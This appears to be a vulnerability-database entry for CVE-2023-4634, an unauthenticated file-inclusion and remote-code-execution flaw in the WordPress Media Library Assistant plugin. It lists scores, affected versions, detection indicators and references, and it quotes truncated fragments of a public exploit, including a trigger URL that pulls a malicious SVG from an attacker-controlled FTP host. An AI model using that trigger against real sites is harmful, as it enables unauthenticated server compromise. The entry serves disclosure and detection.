CVE-2023-4634
Published: 2023-09-06
CVE-2023-4634: The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09.
Priority: P189 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 82.58% (99.6th percentile)
The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| davidlingren | media_library_assistant | < 3.10 | 3.10 |
| dglingren | media_library_assistant | <= 3.09 | — |
Detection & IOCs (extracted from sources)
IOC URL: {{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg
- Monitor GET requests to mla-stream-image.php containing an `mla_stream_file` parameter with an FTP scheme (ftp://); this is the primary exploitation vector for CVE-2023-4634.
- Use Shodan/FOFA/PublicWWW queries to identify exposed WordPress instances running the vulnerable plugin before active exploitation.
- Detect DNS/FTP callback interactions triggered by the mla_stream_file parameter pointing to an external host; these indicate SSRF/LFI probing.
- Flag the presence of `mla_debug=log` and `mla_stream_frame=1` query parameters alongside `mla_stream_file` as indicators of active exploitation attempts.
- Exploitation success depends on the Imagick policy.xml configuration on the target server. Default WordPress/Imagick installations are most at risk.
- The vulnerability is unauthenticated and exploitable via attacker-controlled FTP-hosted SVG files processed by Imagick; no WordPress credentials are required.
CVSS provenance
- NVD (CVSS v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-8mv6-q53q-hqj8 (ghsa_unreviewed · 2023-09-06 · CWE-73): CVE-2023-4634 [CRITICAL]
The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09.
VulnCheck
Media Library Assistant plugin for WordPress Local File Inclusion and Remote Code Execution (vulncheck · 2023 · CVSS 9.8 · CRITICAL)
Affected: davidlingren media_library_assistant
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unava
No detection rules found.
Exploit-DB
Media Library Assistant Wordpress Plugin - RCE and LFI (exploitdb · 2023-10-09 · CVSS 9.8 · CRITICAL)
---
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version:
xmlns="http://www.w3.org/2000/svg">
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Dir
Nuclei
Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion (nuclei · CVSS 9.8 · CRITICAL)
The WordPress Media Library Assistant plugin in versions < 3.09 is vulnerable to a local file inclusion leading to RCE on a default ImageMagick installation/configuration.
Template:
```yaml
id: CVE-2023-4634

info:
  name: Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
  author: Pepitoh,ritikchaddha
  severity: critical
  description: |
    A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to local files.
  remediation: Fixed in ve
```
No writeups or analysis indexed.
References:
- https://github.com/Patrowl/CVE-2023-4634/
- https://packetstormsecurity.com/files/174508/wpmla309-lfiexec.tgz
- https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4
- https://www.wordfence.com/threat-intel/vulnerabilities/id/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cve